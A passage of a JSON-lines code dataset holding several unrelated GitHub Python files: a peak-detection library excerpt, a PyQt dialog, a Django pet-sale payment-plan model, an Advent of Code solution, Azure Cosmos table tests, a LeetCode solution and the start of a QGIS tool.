to 255-255 in ax2 because it is an image.\n ax2.plot([0, 255], [0, 255], '-', c='grey')\n return ax1, ax2\n\n def _plot_persistence_ax2(self, fontsize, ax2, verbose):\n x = self.results['persistence']['birth_level'].values\n y = self.results['persistence']['death_level'].values\n ax2.plot(x, y, '.', c='b')\n if fontsize is not None:\n for i in tqdm(range(0, len(x)), disable=disable_tqdm(verbose)):\n ax2.text(x[i], (y[i] + y[i] * 0.01), str(i + 1), color='b', fontsize=fontsize)\n\n X = np.c_[x, y]\n ax2.plot([np.min(X), np.max(X)], [np.min(X), np.max(X)], '-', c='grey')\n ax2.set_xlabel(\"Birth level\")\n ax2.set_ylabel(\"Death level\")\n ax2.set_xlim((np.min(X), np.max(X)))\n ax2.set_ylim((np.min(X), np.max(X)))\n ax2.grid(True)\n return ax2\n\n def import_example(self, data='2dpeaks', url=None, sep=';', datadir=None):\n \"\"\"Import example dataset from github source.\n\n Description\n -----------\n Import one of the few datasets from github source or specify your own download url link.\n\n Parameters\n ----------\n data : str\n Name of datasets: \"1dpeaks\", \"2dpeaks\", \"2dpeaks_image\", 'btc', 'facebook'\n url : str\n url link to to dataset.\n Verbose : int (default : 3)\n Print to screen. 0: None, 1: Error, 2: Warning, 3: Info, 4: Debug, 5: Trace.\n datadir : path-like\n Directory to store downloaded datasets in. Defaults to data sub-directory\n of findpeaks install location.\n\n Returns\n -------\n pd.DataFrame()\n Dataset containing mixed features.\n\n \"\"\"\n X = import_example(data=data, url=url, sep=sep, verbose=self.verbose, datadir=datadir)\n return X\n\n\n# %%\ndef _plot_original(X, xs, labx, min_peaks, max_peaks, title=None, legend=True, ax=None, figsize=(15, 8), xlabel=None, ylabel=None):\n uilabx = np.unique(labx)\n uilabx = uilabx[~np.isnan(uilabx)]\n\n if ax is None: fig, ax = plt.subplots(figsize=figsize)\n ax.plot(xs, X, 'k')\n if np.any(max_peaks):\n ax.plot(max_peaks, X[max_peaks], \"x\", label='Peak')\n if np.any(min_peaks):\n ax.plot(min_peaks, X[min_peaks], \"o\", label='Valley')\n\n # Color each detected label\n s=np.arange(0, len(X))\n for i in uilabx:\n idx=(labx==i)\n ax.plot(s[idx], X[idx])\n # plt.plot(s[idx], X[idx], label='peak' + str(i))\n\n if legend: ax.legend(loc=0)\n ax.set_title(title)\n if xlabel is not None: ax.set_xlabel(xlabel)\n if ylabel is not None: ax.set_ylabel(ylabel)\n ax.grid(True)\n plt.show()\n return ax\n\n\n# %% Import example dataset from github.\ndef import_example(data='2dpeaks', url=None, sep=';', verbose=3, datadir=None):\n \"\"\"Import example dataset from github source.\n\n Description\n -----------\n Import one of the few datasets from github source or specify your own download url link.\n\n Parameters\n ----------\n data : str\n Name of datasets: \"2dpeaks\" or \"2dpeaks_image\"\n url : str\n url link to to dataset.\n Verbose : int (default : 3)\n Print to screen. 0: None, 1: Error, 2: Warning, 3: Info, 4: Debug, 5: Trace.\n datadir : path-like\n Directory to store downloaded datasets in. Defaults to data sub-directory\n of findpeaks install location.\n\n Returns\n -------\n pd.DataFrame()\n Dataset containing mixed features.\n\n \"\"\"\n if url is not None:\n fn = os.path.basename(urlparse(url).path).strip()\n if not fn:\n if verbose>=3: print('[findpeaks] >Could not determine filename to download .')\n return None\n data, _ = os.path.splitext(fn)\n elif data=='2dpeaks_image':\n url='https://erdogant.github.io/datasets/' + data + '.png'\n fn = \"2dpeaks_image.png\"\n elif data=='2dpeaks':\n url='https://erdogant.github.io/datasets/' + data + '.zip'\n fn = \"2dpeaks.zip\"\n elif data=='1dpeaks':\n # x = [0, 13, 22, 30, 35, 38, 42, 51, 57, 67, 73, 75, 89, 126, 141, 150, 200 ]\n y = [1.5, 0.8, 1.2, 0.2, 0.4, 0.39, 0.42, 0.22, 0.23, 0.1, 0.11, 0.1, 0.14, 0.09, 0.04, 0.02, 0.01]\n # X = np.c_[x, y]\n return y\n elif (data=='btc') or (data=='facebook'):\n from caerus import caerus\n cs = caerus()\n X = cs.download_example(name=data, verbose=verbose)\n return X\n else:\n if verbose>=2: print('[findpeaks] >WARNING: Nothing to download. ')\n return None\n\n if datadir is None: datadir = os.path.join(os.path.dirname(os.path.abspath(__file__)), 'data')\n PATH_TO_DATA = os.path.join(datadir, fn)\n if not os.path.isdir(datadir):\n os.makedirs(datadir, exist_ok=True)\n\n # Check file exists.\n if not os.path.isfile(PATH_TO_DATA):\n if verbose>=3: print('[findpeaks] >Downloading from github source: [%s]' %(url))\n r = requests.get(url, stream=True)\n with open(PATH_TO_DATA, \"wb\") as fd:\n for chunk in r.iter_content(chunk_size=1024):\n fd.write(chunk)\n\n # Import local dataset\n if verbose>=3: print('[findpeaks] >Import [%s]' %(PATH_TO_DATA))\n if data=='2dpeaks_image':\n cv2 = stats._import_cv2()\n X = cv2.imread(PATH_TO_DATA)\n else:\n X = pd.read_csv(PATH_TO_DATA, sep=sep).values\n # Return\n return X\n\n\n# Check url\ndef is_url(url):\n try:\n _ = urlparse(url)\n return True\n except ValueError:\n return False\n\n# %%\n# def disable_tqdm(verbose):\n # \"\"\"Set the verbosity messages.\"\"\"\n # return (True if ((verbose==0 or verbose is None) or verbose>3) else False)\n","repo_name":"erdogant/findpeaks","sub_path":"findpeaks/findpeaks.py","file_name":"findpeaks.py","file_ext":"py","file_size_in_byte":53817,"program_lang":"python","lang":"en","doc_type":"code","stars":174,"dataset":"github-code","pt":"31"} +{"seq_id":"15371994826","text":"import sys\nfrom PyQt5.uic import loadUi\nfrom PyQt5 import QtWidgets\nfrom PyQt5.QtWidgets import QDialog, QApplication\nfrom PyQt5.QtGui import QPixmap\nfrom receiver import ESP32\n\nclass IndoorMain(QDialog):\n '''Show image with a button constructor'''\n def __init__(self):\n super(IndoorMain, self).__init__()\n loadUi('indoor.ui', self)\n #self.btn_show_hidden_image.clicked.connect(self.add_image)\n self.chk_show_data.stateChanged.connect(self.mac_rssi)\n\n def mac_rssi(self):\n message = ESP32()\n if self.lbl_indoor_data.isChecked() == True:\n self.lbl_show_data.setText(message)\n\n\n# Main\napp = QApplication(sys.argv)\nindoormain = IndoorMain()\nwidget = QtWidgets.QStackedWidget()\nwidget.addWidget(indoormain)\nwidget.setFixedHeight(700)\nwidget.setFixedWidth(700)\nwidget.show()\ntry:\n sys.exit(app.exec_())\nexcept:\n print('Existing')\n","repo_name":"thygolem/indoorQt","sub_path":"ips/indoor_app.py","file_name":"indoor_app.py","file_ext":"py","file_size_in_byte":893,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"31"} +{"seq_id":"7196576588","text":"from django.db import models\nfrom math import floor, ceil\nfrom datetime import date, timedelta, datetime\nfrom dateutil.relativedelta import relativedelta\nfrom django.contrib.auth.models import User\n\n# Create your models here.\nclass RatePlan(models.Model):\n CATEGORY_CHOICE = (\n (0, '小型犬'),\n (1, '中型犬'),\n (2, '大型犬'),\n (3, '猫'),\n )\n DC_CHOICE = (\n (0, 'なし'),\n (1, '1vac'),\n (2, '2vac'),\n (3, '3vac'),\n )\n HS_CHOICE = (\n (0, '未加入'),\n (1, 'プラチナ年払い'),\n (2, 'スタンダード年払い'),\n (3, 'プラチナ月払い'),\n (4, 'スタンダード月払い'),\n )\n INSURANCE_CHOICE = (\n (0, '未加入'),\n (1, '100%年払い'),\n (2, '70%年払い'),\n (3, '100%月払い'),\n (4, '70%月払い'),\n )\n FOOD_CHOICE = (\n (0, 'なし'),\n (1, 'あり'),\n )\n HOME_CHOICE = (\n (0, 'なし'),\n (1, 'サークル無しセット'),\n (2, 'サークルセット(小)'),\n (3, 'サークルセット(大)'),\n )\n CARE_CHOICE = (\n (0, 'なし'),\n (1, '短毛用'),\n (2, '長毛用'),\n )\n LOAN_COMPANY_CHOICE = (\n ('一括', '一括'),\n ('PFクレジット', 'PFクレジット'),\n ('アプラス①', 'アプラス①'),\n ('アプラス②', 'アプラス②'),\n ('アプラス③', 'アプラス③'),\n ('PFS', 'PFS'),\n ('FLEX', 'FLEX'),\n ('セディナ', 'セディナ'),\n ('西京カード', '西京カード'),\n ('シティックス', 'シティックス'),\n )\n SUMMER_CHOICE = (\n (6, '6月'),\n (7, '7月'),\n (8, '8月'),\n )\n WINTER_CHOICE = (\n (12, '12月'),\n (1, '1月'),\n )\n\n pet_price = models.IntegerField('ペット代金', help_text='*税込み金額/半角数字で入力')\n other_price = models.IntegerField('その他購入代金', default=0)\n category = models.IntegerField('種別', choices=CATEGORY_CHOICE, default=0)\n dc_plan = models.IntegerField('ドクターズチェックP', help_text='*狂犬病接種の場合は3vacを選択', choices=DC_CHOICE, default=1)\n hs_plan = models.IntegerField('ほっとサポート', choices=HS_CHOICE, default=0)\n insurance_plan = models.IntegerField('ペット保険', choices=INSURANCE_CHOICE, default=0)\n insurance_discount = models.BooleanField('保険多頭割', help_text='*多頭割の場合はチェック', default=False)\n food_plan = models.IntegerField('ごはんセット', choices=FOOD_CHOICE, default=0)\n home_plan = models.IntegerField('おうちセット', choices=HOME_CHOICE, default=0)\n care_plan = models.IntegerField('しつけお手入れセット', choices=CARE_CHOICE, default=0)\n loan_company = models.CharField('支払方法', max_length=10, choices=LOAN_COMPANY_CHOICE, default='アプラス①')\n down_payment = models.IntegerField('頭金', default=0)\n bonus_setting = models.BooleanField('ボーナス支払設定', help_text='*ボーナス支払を設定する場合はチェック', default=False)\n bonus_payment = models.IntegerField('ボーナス加算額', help_text='*1000円単位で入力', default=0)\n bonus_s_month = models.IntegerField('ボーナス月(夏)', choices=SUMMER_CHOICE, default=6)\n bonus_w_month = models.IntegerField('ボーナス月(冬)', choices=WINTER_CHOICE, default=12)\n created_at = models.DateField('作成日', default=date.today)\n user = models.ForeignKey(User, on_delete=models.CASCADE, verbose_name='作成者')\n\n category_dict = ('小型犬', '中型犬', '大型犬', '猫',)\n sub_category_dict = ('犬', '犬', '犬', '猫')\n dc_dict = {\n '犬': (0, 58190, 68310, 79090),\n '猫': (0, 48840, 58960, 58960),\n }\n hs_r_dict = {\n '犬': 0.18,\n '猫': 0.15,\n }\n insurance_dict = {\n '小型犬': (0, 65020, 50280, 19550, 17000),\n '中型犬': (0, 77610, 59690, 23380, 20260),\n '大型犬': (0, 85320, 65450, 25720, 22280),\n '猫': (0, 53550, 41710, 16070, 14020),\n }\n insurance_dc_dict = {\n '小型犬': (0, 61880, 47980, 18680, 16340),\n '中型犬': (0, 73860, 56970, 22330, 19510),\n '大型犬': (0, 81200, 62470, 24580, 21440),\n '猫': (0, 50960, 39800, 15350, 13480),\n }\n insurance_m_dict = {\n '小型犬': (0, 0, 0, 5750, 4210),\n '中型犬': (0, 0, 0, 6860, 4980),\n '大型犬': (0, 0, 0, 7540, 5460),\n '猫': (0, 0, 0, 4740, 3500),\n }\n insurance_dc_m_dict = {\n '小型犬': (0, 0, 0, 5460, 3990),\n '中型犬': (0, 0, 0, 6510, 4730),\n '大型犬': (0, 0, 0, 7160, 5180),\n '猫': (0, 0, 0, 4500, 3320),\n }\n food_dict = {\n '犬': (0, 27500),\n '猫': (0, 18590),\n }\n home_dict = {\n '犬': (0, 20980, 39380, 61600),\n '猫': (0, 0, 36080, 43450),\n }\n care_dict = {\n '犬': (0, 19360, 20900),\n '猫': (0, 12870, 12870),\n }\n loan_dict = {\n 'PFクレジット':\n {'回数':(1,2,3,5,6,10,12,15,18,20,24,30,36,42,48,54,60,72,84),\n '金利': (1.50,2.26,3.01,4.54,5.32,8.43,10.02,12.42,14.85,16.49,19.82,24.92,30.15,35.51,41.00,46.62,52.36,64.22,76.55),\n '支払日': 27,\n '開始月': 1,},\n 'アプラス①':\n {'回数':(3,6,10,12,15,18,20,24,30,36,42,48,54,60,72,84),\n '金利': (0.00,0.00,0.00,8.16,10.20,12.20,13.60,16.30,20.40,24.50,28.60,32.60,36.70,40.80,49.00,57.10),\n '支払日': 27,\n '開始月': 1,},\n 'アプラス②':\n {'回数':(3,6,10,12,15,18,20,24,30,36,42,48,54,60,72,84),\n '金利': (0.00,0.00,0.00,8.16,10.20,12.20,13.60,16.30,20.40,24.50,28.60,32.60,36.70,40.80,49.00,57.10),\n '支払日': 27,\n '開始月': 2,},\n 'アプラス③':\n {'回数':(3,6,10,12,15,18,20,24,30,36,42,48,54,60,72,84),\n '金利': (0.00,0.00,0.00,8.16,10.20,12.20,13.60,16.30,20.40,24.50,28.60,32.60,36.70,40.80,49.00,57.10),\n '支払日': 27,\n '開始月': 3,},\n 'PFS':\n {'回数':(1,3,6,10,12,15,18,20,24,30,36,42,48,54,60,72,84),\n '金利': (0.00,0.00,0.00,0.00,8.16,10.20,12.24,13.60,16.32,20.40,24.48,28.56,32.64,36.72,40.80,48.96,57.12),\n '支払日': 27,\n '開始月': 1,},\n 'FLEX':\n {'回数':(3,10,12,15,18,20,24,36,48,60,72,84),\n '金利': (2.40,8.00,9.60,12.00,14.40,16.00,19.20,28.80,38.40,48.00,57.60,67.20),\n '支払日': 27,\n '開始月': 2,},\n 'セディナ':\n {'回数':(1,2,3,5,8,10,12,15,18,20,24,30,36,42,48,54,60,72,84),\n '金利': (0.00,0.00,0.00,0.00,0.00,0.00,6.00,8.00,9.00,10.50,12.60,16.00,18.90,22.20,25.40,28.60,31.80,38.10,44.50),\n '支払日': 27,\n '開始月': 1,},\n '西京カード':\n {'回数':(1,2,3,5,10,12,15,18,20,24,30,36,42,48,54,60),\n '金利': (),\n '支払日': 6,\n '開始月': 2,},\n 'シティックス':\n {'回数':(1,2,3,5,10,12,15,18,20,24,30,36,42,48,54,60),\n '金利': (),\n '支払日': 27,\n '開始月': 1,},\n }\n\n def __str__(self):\n return str(self.pet_price)\n\n \"\"\"ドクターズチェック代金\"\"\"\n def dc_price(self, category, dc_plan):\n sub_category = RatePlan.sub_category_dict[category]\n dc_price = RatePlan.dc_dict[sub_category][dc_plan]\n return dc_price\n\n \"\"\"ほっとサポート代金\"\"\"\n def hs_price(self, pet_price, category, hs_plan):\n hs_rate = RatePlan.hs_r_dict[RatePlan.sub_category_dict[category]]\n if pet_price <= 110000:\n hs_price = int(110000 * hs_rate)\n if hs_plan == 1:\n hs_price += 20000\n elif hs_plan == 3:\n hs_price = floor((hs_price + 20000) / 120) * 30\n elif hs_plan == 4:\n hs_price = floor(hs_price / 120) * 30\n else:\n hs_price = 0\n else:\n hs_price = int(pet_price * hs_rate)\n if hs_plan == 1:\n hs_price += 20000\n elif hs_plan == 3:\n hs_price = floor((hs_price + 20000) / 120) * 30\n elif hs_plan == 4:\n hs_price = floor(hs_price / 120) * 30\n else:\n hs_price = 0\n return hs_price\n\n \"\"\"ほっとサポート月々支払額(月払い選択時のみ実行)\"\"\"\n def hs_m_price(self, hs_price):\n hs_m_price = int(hs_price / 3)\n return hs_m_price\n\n \"\"\"保険代金\"\"\"\n def insurance_price(self, category, insurance_plan, insurance_discount):\n main_category = RatePlan.category_dict[category]\n if insurance_discount == False:\n insurance_price = RatePlan.insurance_dict[main_category][insurance_plan]\n elif insurance_discount == True:\n insurance_price = RatePlan.insurance_dc_dict[main_category][insurance_plan]\n return insurance_price\n\n \"\"\"保険月々支払額(月払い選択時のみ実行)\"\"\"\n def insurance_m_price(self, category, insurance_plan, insurance_discount):\n main_category = RatePlan.category_dict[category]\n if insurance_discount == False:\n insurance_m_price = RatePlan.insurance_m_dict[main_category][insurance_plan]\n else:\n insurance_m_price = RatePlan.insurance_dc_m_dict[main_category][insurance_plan]\n return insurance_m_price\n\n \"\"\"ごはんセット代金\"\"\"\n def food_price(self, category, food_plan):\n sub_category = RatePlan.sub_category_dict[category]\n food_price = RatePlan.food_dict[sub_category][food_plan]\n return food_price\n\n \"\"\"おうちセット代金\"\"\"\n def home_price(self, category, home_plan):\n sub_category = RatePlan.sub_category_dict[category]\n home_price = RatePlan.home_dict[sub_category][home_plan]\n return home_price\n\n \"\"\"しつけお手入れセット代金\"\"\"\n def care_price(self, category, care_plan):\n sub_category = RatePlan.sub_category_dict[category]\n care_price = RatePlan.care_dict[sub_category][care_plan]\n return care_price\n\n \"\"\"用品セット割\"\"\"\n def set_discount(self, category, food_plan, home_plan, care_plan):\n sub_category = RatePlan.sub_category_dict[category]\n set_discount = 0\n if sub_category == '犬':\n if food_plan == 1:\n if care_plan == 1 or care_plan == 2:\n if home_plan == 2:\n set_discount = -6000\n elif home_plan == 3:\n set_discount = -10000\n return set_discount\n\n \"\"\"トータル金額\"\"\"\n def total_price(self, pet_price, other_price, dc_price, hs_price, insurance_price, food_price, home_price, care_price, set_discount) :\n total_price = pet_price + other_price + dc_price + hs_price + insurance_price + food_price + home_price + care_price + set_discount\n return total_price\n\n \"\"\"分割元金\"\"\"\n def capital(self, total_price, down_payment):\n capital = total_price - down_payment\n return capital\n\n \"\"\"手数料リスト作成\"\"\"\n def ratefee_list(self,capital ,rate_list):\n ratefee_list = []\n count = len(rate_list)\n for c in range(count):\n rate = rate_list[c]\n ratefee = int(capital * rate / 100)\n ratefee_list.append(ratefee)\n return ratefee_list\n\n \"\"\"分割支払金総額リスト作成\"\"\"\n def totalsplit_list(self, capital, ratefee_list):\n totalsplit_list = []\n for ratefee in ratefee_list:\n totalsplit = capital + ratefee\n totalsplit_list.append(totalsplit)\n return totalsplit_list\n\n \"\"\"月々支払金リスト\"\"\"\n def splitmonth_list(self,totalsplit_list, number_list, b_total_list):\n splitmonth_list = []\n for number, ts, bt in zip(number_list, totalsplit_list, b_total_list):\n set_list = []\n ts -= bt\n split2 = int((ts / 100) / number) * 100\n split1 = ts - (split2 * (number - 1))\n if number == 1:\n split2 = ts\n split1 = 0\n set_list.append(split2)\n set_list.append(split1)\n splitmonth_list.append(set_list)\n return splitmonth_list\n\n \"\"\"支払開始日\"\"\"\n def start_date(self, created_at, month, day):\n editdate = date(created_at.year, created_at.month, day)\n start_date = editdate + relativedelta(months=month)\n return start_date\n\n \"\"\"支払完了日リスト\"\"\"\n def enddate_list(self, start_date, number_list):\n enddate_list = []\n for n in number_list:\n n -= 1\n enddate = start_date + relativedelta(months=n)\n enddate = enddate.strftime('%Y/%m')\n enddate_list.append(enddate)\n return enddate_list\n\n \"\"\"ボーナス適用回数リスト\"\"\"\n def b_count_list(self, start_date, number_list):\n b_count_list = []\n for n in number_list:\n b_count = 0\n for c in range(n):\n check_date = start_date + relativedelta(months=c)\n if check_date.month == self.bonus_s_month or check_date.month == self.bonus_w_month:\n b_count += 1\n b_count_list.append(b_count)\n return b_count_list\n\n \"\"\"ボーナス総支払額リスト\"\"\"\n def b_total_list(self, b_count_list):\n b_total_list = []\n for c in b_count_list:\n if self.bonus_setting == False:\n b_total = 0\n else:\n b_total = c * self.bonus_payment\n b_total_list.append(b_total)\n return b_total_list\n\n \"\"\"ボーナス比率リスト\"\"\"\n def b_ratio_list(self, b_total_list, capital):\n b_ratio_list = []\n for bt in b_total_list:\n if bt == 0:\n b_ratio = str(0) + '%'\n else:\n b_ratio = str(ceil(bt / capital * 100)) + '%'\n b_ratio_list.append(b_ratio)\n return b_ratio_list\n","repo_name":"guribee/my-app","sub_path":"app/models.py","file_name":"models.py","file_ext":"py","file_size_in_byte":14384,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"31"} +{"seq_id":"32780176497","text":"import os\nfrom collections import defaultdict\n\n# https://adventofcode.com/2021/day/25\n\ndef nextPos(x,y,mx,my,ch):\n if ch == '>':\n return ((x+1) % mx,y)\n elif ch == 'v':\n return (x,(y+1) % my)\n else:\n return (x,y)\n\ndef dump(map,mx,my):\n for y in range(my):\n s = ''\n for x in range(mx):\n s += map[(x,y)]\n print(s)\n print('')\n\ndef run(map, mx, my):\n m = map.copy()\n steps = 0\n while True:\n moved = False\n steps += 1\n ch = '>'\n #dump(m,mx,my)\n m2 = {}\n for y in range(my):\n for x in range(mx):\n if m[(x,y)] == ch:\n np = nextPos(x,y,mx,my,ch)\n if m[np] == '.':\n m2[(x,y)] = '.'\n m2[np] = ch\n moved = True\n else:\n m2[(x,y)] = m[(x,y)]\n elif (x,y) not in m2:\n m2[(x,y)] = m[(x,y)]\n m = m2\n m2 = {}\n ch = 'v'\n for y in range(my):\n for x in range(mx):\n if m[(x,y)] == ch:\n np = nextPos(x,y,mx,my,ch)\n if m[np] == '.':\n m2[(x,y)] = '.'\n m2[np] = ch\n moved = True\n else:\n m2[(x,y)] = m[(x,y)]\n elif (x,y) not in m2:\n m2[(x,y)] = m[(x,y)]\n\n m = m2\n\n if not moved:\n #print('no movement after', steps)\n return steps\n break\n\n # if steps % 100 == 0:\n # print(steps, 'steps')\n\nwith open(os.path.dirname(os.path.realpath(__file__)) + \"/../input/day25-input\", \"r\") as f:\n input = [line.strip() for line in f.readlines()]\n\n# input = [\n# 'v...>>.vv>',\n# '.vv>>.vv..',\n# '>>.>v>...v',\n# '>>v>>.>.v.',\n# 'v>v.vv.v..',\n# '>.>>..v...',\n# '.vv..>.>v.',\n# 'v.v..>>v.v',\n# '....v..v.>',\n# ]\n\nmap = defaultdict()\nxmax = len(input[0])\nymax = len(input)\nfor y,line in enumerate(input):\n for x,ch in enumerate(line):\n map[(x,y)] = ch\n\nprint(\"Day 25\")\nprint(\" Part 1:\", run(map,xmax,ymax))\n#print(\" Part 2:\", 0)\n","repo_name":"shunty-gh/AdventOfCode2021","sub_path":"py/day25.py","file_name":"day25.py","file_ext":"py","file_size_in_byte":2260,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"31"} +{"seq_id":"43174331286","text":"import pytest\n\nfrom devtools_testutils import AzureTestCase\n\nfrom azure.core.credentials import AzureNamedKeyCredential\nfrom azure.core.exceptions import ResourceExistsError\nfrom azure.data.tables import TableServiceClient\n\nfrom _shared.testcase import TableTestCase, SLEEP_DELAY\nfrom preparers import cosmos_decorator\n\n# ------------------------------------------------------------------------------\nTEST_TABLE_PREFIX = 'pytablesync'\n# ------------------------------------------------------------------------------\n\nclass StorageTableTest(AzureTestCase, TableTestCase):\n\n @cosmos_decorator\n def test_create_table(self, tables_cosmos_account_name, tables_primary_cosmos_account_key):\n # # Arrange\n ts = TableServiceClient(self.account_url(tables_cosmos_account_name, \"cosmos\"), credential=tables_primary_cosmos_account_key)\n\n table_name = self._get_table_reference()\n\n # Act\n table = ts.get_table_client(table_name)\n created = table.create_table()\n\n # Assert\n assert created.name == table_name\n ts.delete_table(table_name)\n\n @cosmos_decorator\n def test_create_table_fail_on_exist(self, tables_cosmos_account_name, tables_primary_cosmos_account_key):\n # Arrange\n ts = TableServiceClient(self.account_url(tables_cosmos_account_name, \"cosmos\"), credential=tables_primary_cosmos_account_key)\n table_name = self._get_table_reference()\n\n # Act\n created = ts.create_table(table_name)\n with pytest.raises(ResourceExistsError):\n ts.create_table(table_name)\n\n # Assert\n assert created\n ts.delete_table(table_name)\n\n @cosmos_decorator\n def test_query_tables_per_page(self, tables_cosmos_account_name, tables_primary_cosmos_account_key):\n # Arrange\n ts = TableServiceClient(self.account_url(tables_cosmos_account_name, \"cosmos\"), credential=tables_primary_cosmos_account_key)\n\n table_name = \"mytable\"\n\n for i in range(5):\n ts.create_table(table_name + str(i))\n\n query_filter = \"TableName eq 'mytable0' or TableName eq 'mytable1' or TableName eq 'mytable2'\"\n table_count = 0\n page_count = 0\n for table_page in ts.query_tables(query_filter, results_per_page=2).by_page():\n\n temp_count = 0\n for table in table_page:\n temp_count += 1\n assert temp_count <= 2\n page_count += 1\n table_count += temp_count\n\n assert page_count == 2\n assert table_count == 3\n\n self._delete_all_tables(ts)\n\n @cosmos_decorator\n def test_query_tables(self, tables_cosmos_account_name, tables_primary_cosmos_account_key):\n # Arrange\n ts = TableServiceClient(self.account_url(tables_cosmos_account_name, \"cosmos\"), credential=tables_primary_cosmos_account_key)\n table = self._create_table(ts)\n\n # Act\n tables = list(ts.list_tables())\n\n # Assert\n assert tables is not None\n assert len(tables) >= 1\n assert tables[0] is not None\n ts.delete_table(table.table_name)\n\n @cosmos_decorator\n def test_query_tables_with_filter(self, tables_cosmos_account_name, tables_primary_cosmos_account_key):\n # Arrange\n ts = TableServiceClient(self.account_url(tables_cosmos_account_name, \"cosmos\"), credential=tables_primary_cosmos_account_key)\n table = self._create_table(ts)\n\n # Act\n name_filter = \"TableName eq '{}'\".format(table.table_name)\n tables = list(ts.query_tables(name_filter))\n\n # Assert\n assert tables is not None\n assert len(tables) == 1\n ts.delete_table(table.table_name)\n\n self._delete_all_tables(ts)\n\n @cosmos_decorator\n def test_query_tables_with_num_results(self, tables_cosmos_account_name, tables_primary_cosmos_account_key):\n # Arrange\n prefix = 'listtable'\n ts = TableServiceClient(self.account_url(tables_cosmos_account_name, \"cosmos\"), credential=tables_primary_cosmos_account_key)\n table_list = []\n for i in range(0, 4):\n self._create_table(ts, prefix + str(i), table_list)\n\n # Act\n small_page = []\n big_page = []\n for s in next(ts.list_tables(results_per_page=3).by_page()):\n small_page.append(s)\n assert s.name.startswith(prefix)\n for t in next(ts.list_tables().by_page()):\n big_page.append(t)\n assert t.name.startswith(prefix)\n\n # Assert\n assert len(small_page) == 3\n assert len(big_page) >= 4\n\n self._delete_all_tables(ts)\n\n @cosmos_decorator\n def test_query_tables_with_marker(self, tables_cosmos_account_name, tables_primary_cosmos_account_key):\n # Arrange\n ts = TableServiceClient(self.account_url(tables_cosmos_account_name, \"cosmos\"), credential=tables_primary_cosmos_account_key)\n prefix = 'listtable'\n table_names = []\n for i in range(0, 4):\n self._create_table(ts, prefix + str(i), table_names)\n\n # table_names.sort()\n\n # Act\n generator1 = ts.list_tables(results_per_page=2).by_page()\n next(generator1)\n generator2 = ts.list_tables(results_per_page=2).by_page(\n continuation_token=generator1.continuation_token)\n next(generator2)\n\n tables1 = generator1._current_page\n tables2 = generator2._current_page\n\n # Assert\n assert len(tables1) == 2\n assert len(tables2) == 2\n assert tables1 != tables2\n\n self._delete_all_tables(ts)\n\n @cosmos_decorator\n def test_delete_table_with_existing_table(self, tables_cosmos_account_name, tables_primary_cosmos_account_key):\n # Arrange\n ts = TableServiceClient(self.account_url(tables_cosmos_account_name, \"cosmos\"), credential=tables_primary_cosmos_account_key)\n table = self._create_table(ts)\n\n # Act\n deleted = ts.delete_table(table_name=table.table_name)\n\n # Assert\n existing = list(ts.query_tables(\"TableName eq '{}'\".format(table.table_name)))\n assert len(existing) == 0\n\n @cosmos_decorator\n def test_delete_table_with_non_existing_table_fail_not_exist(self, tables_cosmos_account_name,\n tables_primary_cosmos_account_key):\n # Arrange\n ts = TableServiceClient(self.account_url(tables_cosmos_account_name, \"cosmos\"), credential=tables_primary_cosmos_account_key)\n table_name = self._get_table_reference()\n ts.delete_table(table_name)\n\n\nclass TestTableUnitTest(TableTestCase):\n tables_cosmos_account_name = \"fake_storage_account\"\n tables_primary_cosmos_account_key = \"fakeXMZjnGsZGvd4bVr3Il5SeHA\"\n credential = AzureNamedKeyCredential(name=tables_cosmos_account_name, key=tables_primary_cosmos_account_key)\n\n def test_create_table_invalid_name(self):\n # Arrange\n ts = TableServiceClient(self.account_url(self.tables_cosmos_account_name, \"cosmos\"), credential=self.credential)\n invalid_table_name = \"my_table\"\n\n with pytest.raises(ValueError) as excinfo:\n ts.create_table(table_name=invalid_table_name)\n\n assert \"Table names must be alphanumeric, cannot begin with a number, and must be between 3-63 characters long.\"\"\" in str(\n excinfo)\n\n def test_delete_table_invalid_name(self):\n # Arrange\n ts = TableServiceClient(self.account_url(self.tables_cosmos_account_name, \"cosmos\"), credential=self.credential)\n invalid_table_name = \"my_table\"\n\n with pytest.raises(ValueError) as excinfo:\n ts.create_table(invalid_table_name)\n\n assert \"Table names must be alphanumeric, cannot begin with a number, and must be between 3-63 characters long.\"\"\" in str(\n excinfo)\n\n def test_unicode_create_table_unicode_name(self):\n # Arrange\n url = self.account_url(self.tables_cosmos_account_name, \"cosmos\")\n ts = TableServiceClient(url, credential=self.credential)\n table_name = u'啊齄丂狛狜'\n\n # Act\n with pytest.raises(ValueError):\n ts.create_table(table_name)","repo_name":"mirespace/python-azure","sub_path":"sdk/tables/azure-data-tables/tests/test_table_cosmos.py","file_name":"test_table_cosmos.py","file_ext":"py","file_size_in_byte":8192,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"31"} +{"seq_id":"38099597702","text":"def stoneGameVII(stones):\n \"\"\"\n :type stones: List[int]\n :rtype: int\n \"\"\"\n alice, bob = 0, 0\n dp = [[0]*len(stones) for i in range(len(stones))]\n n = len(stones)\n for i in range(n-1):\n dp[i][i+1] = max(stones[i], stones[i+1])\n d = {}\n for i in range(2, n): # 二者差值\n for j in range(n-i): # 第一维坐标\n if d.get((j+1, j+i+1), -1) == -1:\n d[(j+1, j+i+1)] = sum(stones[j+1:j+i+1])\n if d.get((j, j+i), -1) == -1:\n d[(j, j+i)] = sum(stones[j:j+i])\n k1 = d[(j+1, j+i+1)] - dp[j+1][j+i] # 选第一个数\n k2 = d[(j, j+i)] - dp[j][j+i-1] # 选最后一个数\n dp[j][j+i] = max(k1, k2)\n return dp[0][n-1]\ns = [1, 3, 5, 7, 9]\nb = [5,3,1,4,2]\na = [7,90,5,1,100,10,10,2]\nprint(stoneGameVII(a))\n\n \n\n\n\n\n\n","repo_name":"wulalala17/leetcode","sub_path":"leetcode/2020/competition/121303.py","file_name":"121303.py","file_ext":"py","file_size_in_byte":841,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"31"} +{"seq_id":"41708875690","text":"from qgis.PyQt.QtGui import (QPixmap, QImage)\nfrom qgis.PyQt.QtWidgets import (QGraphicsScene, QGraphicsView)\nfrom qgis.PyQt.QtCore import (Qt, pyqtSignal, QCoreApplication, QFileInfo, QRectF)\nfrom qgis.core import (QgsRectangle, QgsProject)\nfrom qgis.gui import (QgsMapTool, QgsRubberBand, 